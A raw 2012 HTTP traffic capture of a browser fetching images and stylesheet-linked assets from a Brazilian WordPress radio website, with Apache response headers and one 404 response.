User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/wp-content/themes/novo93/style.css
Cookie: PHPSESSID=a5ekie79krfrha10ie8s4c3397
HTTP/1.1 200 OK

Content-Type: image/png
Date: Wed, 31 Oct 2012 08:35:18 GMT
Server: Apache/2.2.22 (Debian)
Last-Modified: Sun, 15 Jan 2012 02:35:55 GMT
Etag: &quot;e7cac4-d85-4b687f50db8c0&quot;
Accept-Ranges: bytes
Content-Length: 3461
Cache-Control: max-age=86400
Expires: Thu, 01 Nov 2012 08:35:18 GMT
Keep-Alive: timeout=5, max=89
Connection: Keep-Alive
GET /wp-content/themes/novo93/images/setasSlider.png HTTP/1.1

Host: radio93.com.br

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/wp-content/themes/novo93/style.css
Cookie: PHPSESSID=a5ekie79krfrha10ie8s4c3397
HTTP/1.1 200 OK

Content-Type: image/png
Date: Wed, 31 Oct 2012 08:35:18 GMT
Server: Apache/2.2.22 (Debian)
Last-Modified: Sun, 15 Jan 2012 02:38:51 GMT
Etag: &quot;e7cadd-fc7-4b687ff8b44c0&quot;
Accept-Ranges: bytes
Content-Length: 4039
Cache-Control: max-age=86400
Expires: Thu, 01 Nov 2012 08:35:18 GMT
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive
GET /wp-content/themes/novo93/images/loading.gif HTTP/1.1

Host: radio93.com.br

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
Cookie: PHPSESSID=a5ekie79krfrha10ie8s4c3397
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Wed, 31 Oct 2012 08:35:18 GMT
Server: Apache/2.2.22 (Debian)
Last-Modified: Sun, 15 Jan 2012 02:36:05 GMT
Etag: &quot;e7cac8-1aa4-4b687f5a64f40&quot;
Accept-Ranges: bytes
Content-Length: 6820
Cache-Control: max-age=86400
Expires: Thu, 01 Nov 2012 08:35:18 GMT
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
GET /wp-content/plugins/lightbox-plus/css/shadowed/images/border1.png HTTP/1.1

Host: radio93.com.br

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/wp-content/plugins/wp-minify/min/?f=wp-content/plugins/wp-bannerize/css/wpBannerizeStyleDefault.css,wp-content/plugins/tubepress/sys/ui/themes/default/style.css,wp-content/plugins/nextgen-gallery/css/nggallery.css,wp-content/plugins/facebook/style/style.css,wp-content/plugins/wp-polls/polls-css.css,wp-content/plugins/facebook/style/hide-wp-comments.css,wp-content/plugins/lightbox-plus/css/shadowed/colorbox.css,wp-content/plugins/tweet-like/tweetandlike-buttons.css,wp-content/plugins/wordpress-popular-posts/style/wpp.css&amp;debug=true&amp;m=1343672832
Cookie: PHPSESSID=a5ekie79krfrha10ie8s4c3397
HTTP/1.1 200 OK

Content-Type: image/png
Date: Wed, 31 Oct 2012 08:35:18 GMT
Server: Apache/2.2.22 (Debian)
Last-Modified: Tue, 14 Feb 2012 17:22:12 GMT
Etag: &quot;147c04d-421-4b8efd5e39900&quot;
Accept-Ranges: bytes
Content-Length: 1057
Cache-Control: max-age=86400
Expires: Thu, 01 Nov 2012 08:35:18 GMT
Keep-Alive: timeout=5, max=88
Connection: Keep-Alive
GET /wp-content/plugins/lightbox-plus/css/shadowed/images/border2.png HTTP/1.1

Host: radio93.com.br

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/wp-content/plugins/wp-minify/min/?f=wp-content/plugins/wp-bannerize/css/wpBannerizeStyleDefault.css,wp-content/plugins/tubepress/sys/ui/themes/default/style.css,wp-content/plugins/nextgen-gallery/css/nggallery.css,wp-content/plugins/facebook/style/style.css,wp-content/plugins/wp-polls/polls-css.css,wp-content/plugins/facebook/style/hide-wp-comments.css,wp-content/plugins/lightbox-plus/css/shadowed/colorbox.css,wp-content/plugins/tweet-like/tweetandlike-buttons.css,wp-content/plugins/wordpress-popular-posts/style/wpp.css&amp;debug=true&amp;m=1343672832
Cookie: PHPSESSID=a5ekie79krfrha10ie8s4c3397
HTTP/1.1 200 OK

Content-Type: image/png
Date: Wed, 31 Oct 2012 08:35:18 GMT
Server: Apache/2.2.22 (Debian)
Last-Modified: Tue, 14 Feb 2012 17:22:12 GMT
Etag: &quot;147c04e-aa-4b8efd5e39900&quot;
Accept-Ranges: bytes
Content-Length: 170
Cache-Control: max-age=86400
Expires: Thu, 01 Nov 2012 08:35:18 GMT
Keep-Alive: timeout=5, max=91
Connection: Keep-Alive
GET /wp-content/plugins/lightbox-plus/css/shadowed/images/loading.gif HTTP/1.1

Host: radio93.com.br

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/wp-content/plugins/wp-minify/min/?f=wp-content/plugins/wp-bannerize/css/wpBannerizeStyleDefault.css,wp-content/plugins/tubepress/sys/ui/themes/default/style.css,wp-content/plugins/nextgen-gallery/css/nggallery.css,wp-content/plugins/facebook/style/style.css,wp-content/plugins/wp-polls/polls-css.css,wp-content/plugins/facebook/style/hide-wp-comments.css,wp-content/plugins/lightbox-plus/css/shadowed/colorbox.css,wp-content/plugins/tweet-like/tweetandlike-buttons.css,wp-content/plugins/wordpress-popular-posts/style/wpp.css&amp;debug=true&amp;m=1343672832
Cookie: PHPSESSID=a5ekie79krfrha10ie8s4c3397
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Wed, 31 Oct 2012 08:35:18 GMT
Server: Apache/2.2.22 (Debian)
Last-Modified: Tue, 14 Feb 2012 17:22:12 GMT
Etag: &quot;147c04f-24d3-4b8efd5e39900&quot;
Accept-Ranges: bytes
Content-Length: 9427
Cache-Control: max-age=86400
Expires: Thu, 01 Nov 2012 08:35:18 GMT
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
GET /wp-content/uploads/2012/10/ESTA%C3%87%C3%83O-DO-AMOR2.jpg?1351672499379 HTTP/1.1

Host: radio93.com.br

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
Cookie: PHPSESSID=a5ekie79krfrha10ie8s4c3397
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Wed, 31 Oct 2012 08:35:18 GMT
Server: Apache/2.2.22 (Debian)
Last-Modified: Wed, 24 Oct 2012 21:22:19 GMT
Etag: &quot;5c6049-bd57-4ccd4ae76d8c0&quot;
Accept-Ranges: bytes
Content-Length: 48471
Cache-Control: max-age=86400
Expires: Thu, 01 Nov 2012 08:35:18 GMT
Keep-Alive: timeout=5, max=79
Connection: Keep-Alive
GET /amor/wp-content/themes/novo93/images/ranking5.png HTTP/1.1

Host: radio93.com.br

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
Cookie: PHPSESSID=a5ekie79krfrha10ie8s4c3397
HTTP/1.1 404 Not Found

Content-Type: text/html; charset=UTF-8
Date: Wed, 31 Oct 2012 08:35:08 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.5-dev
X-Pingback: http://radio93.com.br/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Wed, 31 Oct 2012 08:35:18 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 8887
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive